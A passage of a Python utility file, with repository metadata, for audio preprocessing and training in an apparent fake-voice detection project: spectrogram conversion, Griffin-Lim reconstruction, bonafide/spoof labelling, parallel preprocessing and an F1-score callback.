inv_preemphasis(\n _griffin_lim(S ** hparams.power, hparams),\n hparams.preemphasis, hparams.preemphasize\n )\n\n\ndef inv_mel_spectrogram(mel_spectrogram, hparams):\n \"\"\"\n Converts mel spectrogram to waveform using librosa\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize(mel_spectrogram, hparams)\n else:\n D = mel_spectrogram\n\n S = _mel_to_linear(\n _db_to_amp(D + hparams.ref_level_db) **\n (1 / hparams.magnitude_power),\n hparams\n ) # Convert back to linear\n\n if hparams.use_lws:\n processor = _lws_processor(hparams)\n D = processor.run_lws(\n S.astype(np.float64).T ** hparams.power\n )\n y = processor.istft(D).astype(np.float32)\n return inv_preemphasis(\n y, hparams.preemphasis, hparams.preemphasize\n )\n else:\n return inv_preemphasis(\n _griffin_lim(S ** hparams.power, hparams),\n hparams.preemphasis, hparams.preemphasize\n )\n\n\n# tensorflow Griffin-Lim\n# Thanks to @begeekmyfriend:\n# https://github.com/begeekmyfriend/Tacotron-2/blob/\n# mandarin-new/datasets/audio.py\n\ndef inv_linear_spectrogram_tensorflow(spectrogram, hparams):\n \"\"\"\n Builds computational graph to convert spectrogram\n to waveform using TensorFlow.\n Unlike inv_spectrogram, this does NOT invert the preemphasis.\n The caller should call\n inv_preemphasis on the output after running the graph.\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize_tensorflow(spectrogram, hparams)\n else:\n D = linear_spectrogram\n\n S = tf.pow(\n _db_to_amp_tensorflow(D + hparams.ref_level_db),\n (1 / hparams.magnitude_power)\n )\n\n return _griffin_lim_tensorflow(\n tf.pow(S, hparams.power), hparams\n )\n\n\ndef inv_mel_spectrogram_tensorflow(mel_spectrogram, hparams):\n \"\"\"\n Builds computational graph to convert mel spectrogram\n to waveform using TensorFlow.\n Unlike inv_mel_spectrogram, this does NOT invert the preemphasis.\n The caller should call\n inv_preemphasis on the output after running the graph.\n \"\"\"\n if hparams.signal_normalization:\n D = _denormalize_tensorflow(mel_spectrogram, hparams)\n else:\n D = mel_spectrogram\n\n S = tf.pow(\n _db_to_amp_tensorflow(D + hparams.ref_level_db),\n (1 / hparams.magnitude_power)\n )\n # Convert back to linear\n S = _mel_to_linear_tensorflow(S, hparams)\n return _griffin_lim_tensorflow(\n tf.pow(S, hparams.power), hparams\n )\n\n\ndef _lws_processor(hparams):\n import lws\n return lws.lws(\n hparams.n_fft, get_hop_size(hparams),\n fftsize=hparams.win_size, mode=\"speech\"\n )\n\ndef _griffin_lim(S, hparams):\n \"\"\"\n liberos implementation of Griffin-Lim\n Based on https://github.com/librosa/librosa/issues/434\n \"\"\"\n angles = np.exp(2j * np.pi * np.random.rand(*S.shape))\n S_complex = np.abs(S).astype(np.complex)\n y = _istft(S_complex * angles, hparams)\n\n for i in range(hparams.griffin_lim_iters):\n angles = np.exp(1j * np.angle(_stft(y, hparams)))\n y = _istft(S_complex * angles, hparams)\n\n return y\n\n\ndef _griffin_lim_tensorflow(S, hparams):\n \"\"\"\n TensorFlow implementation of Griffin-Lim\n Based on https://github.com/Kyubyong/tensorflow-exercises\n /blob/master/Audio_Processing.ipynb\n \"\"\"\n\n with tf.variable_scope('griffinlim'):\n # TensorFlow's stft and istft operate on a\n # batch of spectrograms; create batch of size 1\n S = tf.expand_dims(S, 0)\n S_complex = tf.identity(tf.cast(S, dtype=tf.complex64))\n y = tf.contrib.signal.inverse_stft(\n S_complex, hparams.win_size, get_hop_size(hparams),\n hparams.n_fft\n )\n\n for i in range(hparams.griffin_lim_iters):\n est = tf.contrib.signal.stft(\n y, hparams.win_size, get_hop_size(hparams),\n hparams.n_fft\n )\n angles = est / tf.cast(\n tf.maximum(1e-8, tf.abs(est)), tf.complex64\n )\n y = tf.contrib.signal.inverse_stft(\n S_complex * angles, hparams.win_size,\n get_hop_size(hparams), hparams.n_fft\n )\n\n return tf.squeeze(y, 0)\n\n\ndef _stft(y, hparams):\n if hparams.use_lws:\n return _lws_processor(hparams).stft(y).T\n else:\n return librosa.stft(\n y=y, n_fft=hparams.n_fft,\n hop_length=get_hop_size(hparams),\n win_length=hparams.win_size,\n pad_mode='constant'\n )\n\n\ndef _istft(y, hparams):\n return librosa.istft(\n y, hop_length=get_hop_size(hparams),\n win_length=hparams.win_size\n )\n\n\n# Those are only correct when using lws!!!\n# (This was messing with Wavenet quality for a long time!)\ndef num_frames(length, fsize, fshift):\n \"\"\"\n Compute number of time frames of spectrogram\n \"\"\"\n pad = (fsize - fshift)\n if length % fshift == 0:\n M = (length + pad * 2 - fsize) // fshift + 1\n else:\n M = (length + pad * 2 - fsize) // fshift + 2\n return M\n\n\ndef pad_lr(x, fsize, fshift):\n \"\"\"\n Compute left and right padding\n \"\"\"\n M = num_frames(len(x), fsize, fshift)\n pad = (fsize - fshift)\n T = len(x) + 2 * pad\n r = (M - 1) * fshift + fsize - T\n return pad, pad + r\n\n\n# Librosa correct padding\ndef librosa_pad_lr(x, fsize, fshift, pad_sides=1):\n \"\"\"\n compute right padding (final frame) or both sides\n padding (first and final frames)\n \"\"\"\n assert pad_sides in (1, 2)\n # return int(fsize // 2)\n pad = (x.shape[0] // fshift + 1) * fshift - x.shape[0]\n\n if pad_sides == 1:\n return 0, pad\n else:\n return pad // 2, pad // 2 + pad % 2\n\n\n# Conversions\n_mel_basis = None\n_inv_mel_basis = None\n\n\ndef _linear_to_mel(spectogram, hparams):\n global _mel_basis\n if _mel_basis is None:\n _mel_basis = _build_mel_basis(hparams)\n return np.dot(_mel_basis, spectogram)\n\n\ndef _mel_to_linear(mel_spectrogram, hparams):\n global _inv_mel_basis\n if _inv_mel_basis is None:\n _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams))\n return np.maximum(1e-10, np.dot(_inv_mel_basis, mel_spectrogram))\n\n\ndef _mel_to_linear_tensorflow(mel_spectrogram, hparams):\n global _inv_mel_basis\n\n if _inv_mel_basis is None:\n _inv_mel_basis = np.linalg.pinv(_build_mel_basis(hparams))\n\n return tf.transpose(\n tf.maximum(1e-10, tf.matmul(\n tf.cast(_inv_mel_basis, tf.float32),\n tf.transpose(mel_spectrogram, [1, 0]))\n ), [1, 0]\n )\n\n\ndef _build_mel_basis(hparams):\n assert hparams.fmax <= hparams.sample_rate // 2\n return librosa.filters.mel(\n hparams.sample_rate, hparams.n_fft,\n n_mels=hparams.num_mels, fmin=hparams.fmin, fmax=hparams.fmax\n )\n\n\ndef _amp_to_db(x, hparams):\n min_level = np.exp(hparams.min_level_db / 20 * np.log(10))\n return 20 * np.log10(np.maximum(min_level, x))\n\n\ndef _db_to_amp(x):\n return np.power(10.0, x * 0.05)\n\n\ndef _db_to_amp_tensorflow(x):\n return tf.pow(tf.ones(tf.shape(x)) * 10.0, x * 0.05)\n\n\ndef _normalize(S, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n return np.clip((2 * hparams.max_abs_value) * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n ) - hparams.max_abs_value,\n -hparams.max_abs_value, hparams.max_abs_value\n )\n else:\n return np.clip(\n hparams.max_abs_value * (\n (S - hparams.min_level_db) / -hparams.min_level_db\n ), 0, hparams.max_abs_value\n )\n\n assert S.max() <= 0 and S.min() - hparams.min_level_db >= 0\n if hparams.symmetric_mels:\n return (2 * hparams.max_abs_value) * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n ) - hparams.max_abs_value\n else:\n return hparams.max_abs_value * (\n (S - hparams.min_level_db) / (-hparams.min_level_db)\n )\n\n\ndef _denormalize(D, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n clip_val = np.clip(\n D, -hparams.max_abs_value, hparams.max_abs_value\n )\n return hparams.min_level_db + (\n (clip_val + hparams.max_abs_value) *\n -hparams.min_level_db / (2 * hparams.max_abs_value)\n )\n else:\n return hparams.min_level_db + (\n np.clip(D, 0, hparams.max_abs_value) *\n -hparams.min_level_db / hparams.max_abs_value\n )\n\n if hparams.symmetric_mels:\n return ((\n (D + hparams.max_abs_value) *\n -hparams.min_level_db / (\n 2 * hparams.max_abs_value\n )) + hparams.min_level_db\n )\n else:\n return (\n (D * -hparams.min_level_db / hparams.max_abs_value) +\n hparams.min_level_db\n )\n\ndef _denormalize_tensorflow(D, hparams):\n if hparams.allow_clipping_in_normalization:\n if hparams.symmetric_mels:\n return hparams.min_level_db + (\n tf.clip_by_value(\n D, -hparams.max_abs_value, hparams.max_abs_value\n ) + hparams.max_abs_value\n ) * -hparams.min_level_db / (2 * hparams.max_abs_value)\n else:\n return (\n tf.clip_by_value(D, 0, hparams.max_abs_value) *\n -hparams.min_level_db / hparams.max_abs_value\n ) + hparams.min_level_db\n\n if hparams.symmetric_mels:\n return (\n (D + hparams.max_abs_value) *\n -hparams.min_level_db / (2 * hparams.max_abs_value)\n ) + hparams.min_level_db\n else:\n return (\n (D * -hparams.min_level_db / hparams.max_abs_value) +\n hparams.min_level_db\n )\n\n\n# given a path, return list of all files in directory\ndef get_list_of_wav_files(file_path):\n files = os.listdir(file_path)\n absolute_given_dir = os.path.abspath(file_path)\n\n absolute_files = list(map(\n lambda path:\n os.path.join(absolute_given_dir, path), files\n ))\n\n return absolute_files\n\n\ndef convert_to_flac(dir_path):\n for file_path in os.listdir(dir_path):\n if file_path.split('.')[-1] != \"flac\":\n read_file = AudioSegment.from_file(\n os.path.join(dir_path, file_path),\n file_path.split('.')[-1]\n )\n os.remove(os.path.join(dir_path, file_path))\n base_name = file_path.split('.')[:-1]\n # read_file = read_file.set_channels(8)\n # base_name = \".\".join(base_name)\n read_file.export(\n os.path.join(dir_path, f\"{base_name[0]}.flac\"),\n format=\"flac\"\n )\n\n\ndef get_target(file_path):\n if '/real/' in file_path:\n return 'real'\n elif '/fake/' in file_path:\n return 'fake'\n\n\ndef save_wav_to_npy(output_file, spectrogram):\n np.save(output_file, spectrogram)\n\n\ndef wav_to_mel(input_file, output_path):\n y, sr = librosa.load(input_file)\n filename = os.path.basename(input_file)\n target = get_target(input_file)\n\n output_file = '{}{}-{}'.format(\n output_path, filename.split('.')[0], target\n )\n\n mel_spec = librosa.feature.melspectrogram\n mel_spectrogram_of_audio = mel_spec(y=y, sr=sr).T\n save_wav_to_npy(output_file, mel_spectrogram_of_audio)\n\n\ndef convert_and_save(\n real_audio_files, output_real, fake_audio_files, output_fake\n):\n for file in real_audio_files:\n wav_to_mel(file, output_real)\n\n print(\n str(len(real_audio_files)) +\n ' real files converted to spectrogram'\n )\n\n for file in fake_audio_files:\n wav_to_mel(file, output_fake)\n\n print(\n str(len(fake_audio_files)) +\n ' fake files converted to spectrogram'\n )\n\n\ndef split_title_line(title_text, max_words=5):\n \"\"\"\n A function that splits any string based on specific character\n (returning it with the string), with maximum number of words on it\n \"\"\"\n seq = title_text.split()\n return '\\n'.join([\n ' '.join(seq[i:i + max_words])\n for i in range(0, len(seq), max_words)\n ])\n\n\ndef plot_spectrogram(\n pred_spectrogram, path, title=None, split_title=False,\n target_spectrogram=None, max_len=None, auto_aspect=False\n):\n if max_len is not None:\n target_spectrogram = target_spectrogram[:max_len]\n pred_spectrogram = pred_spectrogram[:max_len]\n\n if split_title:\n title = split_title_line(title)\n\n fig = plt.figure(figsize=(10, 8))\n # Set common labels\n fig.text(\n 0.5, 0.18, title,\n horizontalalignment='center', fontsize=16\n )\n\n # target spectrogram subplot\n if target_spectrogram is not None:\n ax1 = fig.add_subplot(311)\n ax2 = fig.add_subplot(312)\n\n if auto_aspect:\n im = ax1.imshow(\n np.rot90(target_spectrogram), aspect='auto',\n interpolation='none'\n )\n else:\n im = ax1.imshow(\n np.rot90(target_spectrogram),\n interpolation='none'\n )\n\n ax1.set_title('Target Mel-Spectrogram')\n fig.colorbar(\n mappable=im, shrink=0.65,\n orientation='horizontal', ax=ax1\n )\n\n ax2.set_title('Predicted Mel-Spectrogram')\n else:\n ax2 = fig.add_subplot(211)\n\n if auto_aspect:\n im = ax2.imshow(\n np.rot90(pred_spectrogram), aspect='auto',\n interpolation='none'\n )\n else:\n im = ax2.imshow(\n np.rot90(pred_spectrogram),\n interpolation='none'\n )\n\n fig.colorbar(\n mappable=im, shrink=0.65,\n orientation='horizontal', ax=ax2\n )\n\n plt.tight_layout()\n plt.savefig(path, format='png')\n plt.close()\n\n\ndef process_audio_files(filename, dirpath):\n audio_array, sample_rate = librosa.load(\n os.path.join(dirpath, 'flac', filename), sr=16000\n )\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin'\n ]).T\n \"\"\"\n\n label_name = filename.split('_')[-1].split('.')[0]\n if (label_name == 'bonafide') or ('target' in label_name):\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n if label is None:\n print(f\"Removing {filename} since it does not have label\")\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n return mel_spec_array, label\n\ndef convert_audio_to_processed_list(\n input_audio_array_list, filename, dirpath\n):\n label_name = filename.split('_')[-1].split('.')[0]\n out_list = []\n\n if label_name == 'spoof':\n audio_array_list = [input_audio_array_list[0]]\n choose_random_one_ind = np.random.choice(\n np.arange(1, len(input_audio_array_list))\n )\n audio_array_list.append(\n input_audio_array_list[choose_random_one_ind]\n )\n label = 0\n\n elif (label_name == 'bonafide') or ('target' in label_name):\n audio_array_list = input_audio_array_list\n label = 1\n else:\n audio_array_list = [input_audio_array_list[0]]\n label = None\n\n for audio_array in audio_array_list:\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin']\n ).T\n \"\"\"\n\n if label is None:\n print(f\"Removing {filename} since it does not have label\")\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n out_list.append([mel_spec_array, label])\n\n return out_list\n\n\ndef preprocess_and_save_audio_from_ray_parallel(\n dirpath, mode, recompute=False, dir_num=None, isaug=False\n):\n if isaug:\n preproc_filename = f'{mode}_preproc_aug.npy'\n else:\n preproc_filename = f'{mode}_preproc.npy'\n\n # if mode != 'train':\n # preproc_filename = f'{mode}_preproc.npy'\n\n if dir_num is not None:\n base_path = base_data_path[dir_num]\n else:\n base_path = base_data_path[0]\n\n is_file = os.path.isfile(os.path.join(\n f'{base_path}/preprocessed_data', preproc_filename\n ))\n\n if not is_file or recompute:\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n num_cores = multiprocessing.cpu_count() - 1\n\n if isaug:\n precproc_list_saved = Parallel(n_jobs=num_cores)(\n delayed(process_audio_files_with_aug)(\n filename, dirpath\n ) for filename in tqdm(filenames)\n )\n\n # Flatten the list\n print(\n f\"******original len of preproc_list:\",\n len(precproc_list_saved)\n )\n precproc_list = []\n for i in range(len(precproc_list_saved)):\n precproc_list.extend(precproc_list_saved[i])\n\n \"\"\"\n precproc_list = [\n item for sublist in precproc_list\n for item in sublist\n ]\n \"\"\"\n print(\n f\"******flattened len of preproc_list:\",\n len(precproc_list)\n )\n else:\n precproc_list = Parallel(n_jobs=num_cores)(\n delayed(process_audio_files)(filename, dirpath)\n for filename in tqdm(filenames)\n )\n\n precproc_list = [x for x in precproc_list if x[1] is not None]\n\n if not os.path.isdir(f'{base_path}/preprocessed_data'):\n os.mkdir(f'{base_path}/preprocessed_data')\n\n np.save(os.path.join(\n f'{base_path}/preprocessed_data', preproc_filename\n ), precproc_list)\n else:\n print(\"Preprocessing already done!\")\n\ndef process(*args, **kwargs):\n return process_audio_files_inference(*args, **kwargs)\n\ndef load_melspectrogram(path, is_raw_audio=False):\n if is_raw_audio:\n audio_array = path\n else:\n audio_array, sample_rate = librosa.load(path, sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n return mel_spec_array\n\ndef process_audio_files_inference(\n filename, dirpath, mode, normalize=False\n):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n elif type(filename) == np.ndarray:\n filename = os.path.join(*filename)\n\n path = os.path.join(dirpath, filename)\n mel_spec_array = load_melspectrogram(path)\n\n # https://stackoverflow.com/questions/57072513/\n duration = get_duration(filename)\n\n if mode == 'unlabeled':\n return mel_spec_array\n elif mode == 'real':\n label = 0\n elif mode == 'fake':\n label = 1\n elif mode in (0, 1):\n label = mode\n else:\n raise ValueError(f'BAD MODE {mode}')\n\n return mel_spec_array, label, duration\n\n\ndef get_durations(filenames, dirpath='', show_pbar=True):\n if show_pbar:\n iterable = tqdm(range(len(filenames)))\n else:\n iterable = range(len(filenames))\n\n durations = []\n for k in iterable:\n filename = filenames[k]\n if show_pbar:\n iterable.set_description(str(filename))\n\n duration = get_duration(filename, dirpath)\n durations.append(duration)\n\n return durations\n\n\ndef get_duration(filename, dirpath=''):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n file_path = os.path.join(dirpath, filename)\n file = sf.SoundFile(file_path)\n duration = file.frames / file.samplerate\n return duration\n\ndef get_frames(filename, dirpath=''):\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n file_path = os.path.join(dirpath, filename)\n file = sf.SoundFile(file_path)\n frames = file.frames\n return frames\n\n\ndef preprocess_from_filenames(\n filenames, dirpath, mode, use_parallel=True,\n show_pbar=True, num_cores=None, func=process,\n cache=None, cache_threshold=30, normalize=False\n):\n if show_pbar:\n iterable = tqdm(range(len(filenames)))\n else:\n iterable = range(len(filenames))\n\n if num_cores is None:\n num_cores = multiprocessing.cpu_count()\n\n arg_list = []\n cache_list = []\n\n if use_parallel:\n process_list = []\n\n for k in iterable:\n filename = filenames[k]\n if type(filename) is tuple:\n filename = os.path.join(*filename)\n\n if type(mode) is dict:\n file_mode = mode[filename]\n elif type(mode) in (list, tuple):\n assert len(mode) == len(filenames)\n file_mode = mode[k]\n else:\n file_mode = mode\n\n delayed_func = delayed(func)\n args = (filename, dirpath, file_mode, normalize)\n\n if args in cache:\n data = cache[args]\n cache_list.append(data)\n continue\n\n process = delayed_func(*args)\n process_list.append(process)\n arg_list.append(args)\n\n preproc_list = Parallel(n_jobs=num_cores)(process_list)\n\n else:\n preproc_list = []\n for k in iterable:\n filename = filenames[k]\n\n if type(mode) is dict:\n file_mode = mode[filename]\n elif type(mode) in (list, tuple):\n assert len(mode) == len(filenames)\n file_mode = mode[k]\n else:\n file_mode = mode\n\n args = (filename, dirpath, file_mode, normalize)\n if args in cache:\n data = self.cache[args]\n preproc_list.append(data)\n continue\n\n preproc_list.append(func(*args))\n arg_list.append(args)\n\n durations = []\n for k, data in enumerate(preproc_list):\n mel_spec_array, label, duration = data\n durations.append(duration)\n args = arg_list[k]\n\n if (duration > cache_threshold) and (args not in cache):\n cache[args] = data\n\n # print('MAX DURATIONS', max(durations))\n preproc_list.extend(cache_list)\n return preproc_list\n\n\ndef preprocess_parallel(*args, **kwargs):\n return preprocess_from_ray_parallel_inference(*args, **kwargs)\n\ndef preprocess_from_ray_parallel_inference(\n dirpath, mode, use_parallel=True\n):\n filenames = os.listdir(os.path.join(dirpath, mode))\n return preprocess_from_filenames(\n filenames=filenames, dirpath=dirpath, mode=mode,\n use_parallel=use_parallel\n )\n\n\ndef preprocess_and_save_audio_from_ray(dirpath, mode, recompute=False):\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n is_file = os.path.isfile(os.path.join(\n f'{base_data_path}/preprocessed_data', f'{mode}_preproc.npy'\n ))\n\n if not is_file or recompute:\n precproc_list = []\n\n for filename in tqdm(filenames):\n audio_array, sample_rate = librosa.load(os.path.join(\n dirpath, 'flac', filename\n ), sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = melspectrogram(\n trim_audio_array, hparams=hparams\n ).T\n\n \"\"\"\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate, \n n_mels=model_params['num_freq_bin']\n ).T\n \"\"\"\n label_name = filename.split('_')[-1].split('.')[0]\n if label_name == 'bonafide':\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n if label is not None:\n precproc_list.append((mel_spec_array, label))\n if label is None:\n print(\n f\"Removing {filename} since it does not have label\"\n )\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n if not os.path.isdir(f'{base_data_path}/preprocessed_data'):\n os.mkdir(f'{base_data_path}/preprocessed_data')\n\n np.save(os.path.join(\n f'{base_data_path}/preprocessed_data', f'{mode}_preproc.npy'\n ), precproc_list)\n\n \"\"\"\n np.save(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ), precproc_list)\n \"\"\"\n else:\n print(\"Preprocessing already done!\")\n\n\ndef preprocess_and_save_audio(dirpath, recompute=False):\n filenames = os.listdir(os.path.join(dirpath, 'flac'))\n is_file = os.path.isfile(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ))\n\n if not is_file or recompute:\n precproc_list = []\n\n for filename in tqdm(filenames):\n audio_array, sample_rate = librosa.load(os.path.join(\n dirpath, 'flac', filename\n ), sr=16000)\n\n trim_audio_array, index = librosa.effects.trim(audio_array)\n mel_spec_array = librosa.feature.melspectrogram(\n y=trim_audio_array, sr=sample_rate,\n n_mels=model_params['num_freq_bin']\n ).T\n\n label_name = filename.split('_')[-1].split('.')[0]\n\n if label_name == 'bonafide':\n label = 1\n elif label_name == 'spoof':\n label = 0\n else:\n label = None\n\n if label is not None:\n precproc_list.append((mel_spec_array, label))\n if label is None:\n print(\n f\"Removing {filename} since it does not have label\"\n )\n os.remove(os.path.join(dirpath, 'flac', filename))\n\n if not os.path.isdir(os.path.join(dirpath, 'preproc')):\n os.mkdir(os.path.join(dirpath, 'preproc'))\n\n np.save(os.path.join(\n dirpath, 'preproc', 'preproc.npy'\n ), precproc_list)\n else:\n print(\"Preprocessing already done!\")\n\n\ndef describe_array(arr):\n print(\n f\"Mean duration: {arr.mean()}\" +\n \"\\nStandard Deviation: {arr.std()}\" +\n \"\\nNumber of Clips: {len(arr)}\"\n )\n plt.hist(arr, bins=40)\n plt.show()\n\n\ndef get_durations_from_dir(audio_dir, file_extension='.wav'):\n durations = list()\n\n for root, dirs, filenames in os.walk(audio_dir):\n for file_name in filenames:\n if file_extension in file_name:\n file_path = os.path.join(root, file_name)\n audio = AudioSegment.from_wav(file_path)\n duration = audio.duration_seconds\n durations.append(duration)\n\n return np.array(durations)\n\n\ndef get_zero_pad(batch_input):\n # find max length\n max_length = np.max([len(x) for x in batch_input])\n\n for i, arr in enumerate(batch_input):\n curr_length = len(arr)\n pad_length = max_length - curr_length\n\n if len(arr.shape) > 1:\n arr = np.concatenate([\n arr, np.zeros((pad_length, arr.shape[-1]))\n ])\n else:\n arr = np.concatenate([arr, np.zeros(pad_length)])\n\n batch_input[i] = arr\n\n return batch_input\n\n\ndef truncate_array(batch_input):\n min_arr_len = np.min([len(x) for x in batch_input])\n for i, arr in enumerate(batch_input):\n batch_input[i] = arr[:min_arr_len]\n return batch_input\n\n\ndef random_truncate_array(batch_input):\n min_arr_len = np.min([len(x) for x in batch_input])\n\n for i, arr in enumerate(batch_input):\n upper_limit_start_point = len(arr) - min_arr_len\n\n if upper_limit_start_point > 0:\n start_point = np.random.randint(0, upper_limit_start_point)\n else:\n start_point = 0\n\n batch_input[i] = arr[start_point:(start_point + min_arr_len)]\n\n return batch_input\n\n\nclass f1_score_callback(object):\n def __init__(\n self, x_val_inp, y_val_inp, model_save_filename=None,\n save_model=True\n ):\n self.x_val = x_val_inp\n self.y_val = y_val_inp\n self.model_save_filename = model_save_filename\n self.save_model = save_model\n self._val_f1 = 0\n\n self.f1_score_value = None\n\n def on_train_begin(self, logs=None):\n self.f1_score_value = []\n\n def on_epoch_end(self, epoch, logs=None):\n y_val = self.y_val\n datagen_val = DataGenerator(self.x_val, mode='test')\n y_pred = self.model.predict_generator(\n datagen_val, use_multiprocessing=False, max_queue_size=50\n )\n y_pred_labels = np.zeros((len(y_pred)))\n y_pred_labels[y_pred.flatten() > 0.5] = 1\n\n self._val_f1 = f1_score(y_val, y_pred_labels.astype(int))\n print(f\"val_f1: {self._val_f1:.4f}\")\n self.f1_score_value.append(self._val_f1)\n\n if self.save_model:\n if self._val_f1 >= max(self.f1_score_value):\n print(\"F1 score has improved. Saving model.\")\n self.model.save(self.model_save_filename)\n\n try:\n foundations.log_metric('epoch_val_f1_score', self._val_f1)\n foundations.log_metric(\n 'best_f1_score', max(self.f1_score_value)\n )\n except Exception as e:\n print(e)\n\n return\n\n\nclass DataGenerator(object):\n def __init__(\n self, x_set, y_set=None, sample_weights=None,\n batch_size=model_params['batch_size'], shuffle=False,\n mode='train'\n ):\n self.x, self.y = x_set, y_set\n self.batch_size = batch_size\n self.shuffle = shuffle\n self.mode = mode\n self.sample_weights = sample_weights\n\n if self.mode != 'train':\n self.shuffle = False\n\n self.n = 0\n self.max = self.__len__()\n\n def __len__(self):\n return int(np.ceil(len(self.x) / float(self.batch_size)))\n\n def __getitem__(self, idx):\n batch_x = self.x[\n idx * self.batch_size:(idx + 1) * self.batch_size\n ]\n batch_x = get_zero_pad(batch_x)\n # batch_x = random_truncate_array(batch_x)\n batch_x = np.array(batch_x)\n batch_x = batch_x.reshape((len(batch_x), -1, hparams.num_mels))\n\n if self.mode != 'test':\n batch_y = self.y[\n idx * self.batch_size:(idx + 1) * self.batch_size\n ]\n\n # read your data here using the batch lists,\n # batch_x and batch_y\n\n if self.mode == 'train':\n return np.array(batch_x), np.array(batch_y)\n if self.mode == 'val':\n return np.array(batch_x), np.array(batch_y)\n else:\n return np.array(batch_x)\n\n def __next__(self):\n if self.n >= self.max:\n self.n = 0\n\n result = self.__getitem__(self.n)\n self.n += 1\n return result\n", "repo_name": "milselarch/AISG", "sub_path": "FakeVoiceTorch/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 35619, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.random.seed", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.environ.get", "line_number": 32, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 34, "usage_type": "call"}, {"api_name": "librosa.display.core.load", "line_number": 43, "usage_type": "call"}, {"api_name": "librosa.display.core", "line_number": 43, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 47, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.int16", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.io.wavfile.write", "line_number": 55, "usage_type": "call"}, {"api_name": "scipy.io.wavfile", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.int16", "line_number": 55, "usage_type": "attribute"}, {"api_name": "scipy.signal.lfilter", "line_number": 60, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 60, "usage_type": "name"}, {"api_name": "scipy.signal.lfilter", "line_number": 66, "usage_type": "call"}, {"api_name": "scipy.signal", "line_number": 66, "usage_type": "name"}, {"api_name": "librosa.display.effects.trim", "line_number": 99, "usage_type": "call"}, {"api_name": "librosa.display.effects", "line_number": 99, "usage_type": "attribute"}, {"api_name": "librosa.display", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.abs", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 158, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 160, "usage_type": "attribute"}, {"api_name": "numpy.float64", "line_number": 189, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 191, "usage_type": "attribute"}, {"api_name": "lws.lws", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.random.rand", "line_number": 266, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 266, "usage_type": "attribute"}, {"api_name": "numpy.abs", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.complex", "line_number": 267, "usage_type": "attribute"}, {"api_name": "numpy.exp", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.angle", "line_number": 271, "usage_type": "call"}, {"api_name": "librosa.display.stft", "line_number": 314, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 314, "usage_type": "name"}, {"api_name": "librosa.display.istft", "line_number": 323, "usage_type": "call"}, {"api_name": "librosa.display", "line_number": 323, "usage_type": "name"}, {"api_name": "numpy.dot", "line_number": 379, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 385, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 385, "usage_type": "attribute"}, {"api_name": "numpy.maximum", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 386, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 393, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 393, "usage_type": "attribute"}, {"api_name": "librosa.display.filters.mel", "line_number": 405, "usage_type": "call"}, {"api_name": 